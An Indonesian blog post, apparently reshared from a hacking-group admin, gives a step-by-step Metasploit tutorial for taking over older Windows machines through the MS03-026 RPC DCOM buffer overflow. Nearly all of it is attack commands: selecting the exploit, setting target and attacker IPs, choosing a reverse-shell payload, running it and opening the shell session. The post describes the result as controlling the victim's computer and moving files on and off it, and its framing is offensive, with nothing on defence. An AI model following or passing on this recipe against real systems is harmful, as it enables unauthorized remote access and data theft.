FREE BITCOIN

[TUTORIAL METASPLOIT Part 3]

[TUTORIAL METASPLOIT Part 3]
Level : Networking (BASIC)
Title : Metasploit
Izin Share dari Luciffer (Admin 1337Cyberindo)
Tutorial kali ini kita akan bahas teknik hacking komputer jaringan, masih dengan tools sejuta umat yaitu Metasploit Tutorial ini kita akan coba mengexploitasi varian windows, misal windows XP,Windows vista, Server 2003 dan 2008.
Sebelumnya pastikan Anda telah membaca tutorialmetasploit dengan merujuk link ini:
Part 1
Part 2
Pemahaman
Windows familiar untuk operating system,beberapa varian windows memiliki kerentanan untuk di exploit yaitu dengan: RPC DCOM. dengan serangan buffer overflow, kita dapat mengeksekusi kode yang kita inginkan pada komputer korban.
Langkah langkah :
1) Jalankan metasploit, buat workspace.
Untuk memilih exploiter yang kita inginkan, kita akan mencari database metasploit menggunakan perintah "search" . kita gunakan DCOM untuk exploiter, perintahnya:
‪#‎msf‬> search DCOM
2) Dalam result, Anda akan melihat "exploit/windows/dcerpc/ms03_026_dcom", itu exploiter yang akan kita gunakan. seperti biasa kita pakai parameter " use " untuk menggunakan exploit nya,perintahnya ::
#msf > use exploit/windows/dcerpc/ms03_026_dcom
3)Setting exploit
Kita sekarang perlu mensetting sebelum mengeksploitasi,dan melihat apa isi setingannya kita gunakan parameter "show options", perintahnya :
#msf > show options
Selanjutnya ada 2 pilihan yang perlu di set, yaitu RHOST dan LHOST.
RHOST adalah alamat IP komputer target, misalnya disini192.168.1.10. kita akan exploit menggunakan port 135 untuk terhubung ke komputer korban.
sedangkan LHOST adalah alamat IP attacker, dalam hal ini 192.168.1.8. kita gunakan parameter " set ",pengaturannya kira kira seperti ini:
#msf> set RHOST 192.168.1.10
#msf> set LHOST 192.168.1.8
4)Memilih Payload
Payload untuk exploit ini akan dijalankan oleh "buffer overflow".kita cari pilihan nya dengan parameter "show", perintahnya:
#msf> show payloads
kali ini kita akan gunakan payload untuk membuka reverse shell pada sistem target, dari daftar payload, kita akan memilih "generic/shell_reverse_tcp", dengan menggunakan perintah "set":
#msf > set PAYLOAD generic/shell_reverse_tcp
6) Exploit
sekarang kita jalankan exploit,dengan perintah:
#msf> exploit
7) Menunggu...hmmm..Kopi hideung heula meh lincah !!!
Sekarang kita tinggal menunggu proses dan membuka shell pada komputer target.Ketik perintah berikut untuk membuka perintah shell pada sistem windows yang kita exploit tadi, perintahnya:
‪#‎sessions‬ –i 1
================= 8)))))))))))D******=====================
"Sekarang anda sudah menguasai komputer target dalam jaringan ", Selanjutnya anda tinggal eksekusi apa yang diinginkan, misal download file, upload file dll. Parameter perintahnya ada di Tutorial Metasploit part 1 dengan link diatas.
Oke..terima kasih sudah menyimak, silahkan praktekan di jaringan komputer anda dengan windows sebagai server/target nya.
jika ingin copas sertakan sumber ini...respect (Y)
Regard's
Luciffer (Admin 1337Cyberindo)

Subscribe to receive free email updates:

0 Response to "[TUTORIAL METASPLOIT Part 3]"

Post a Comment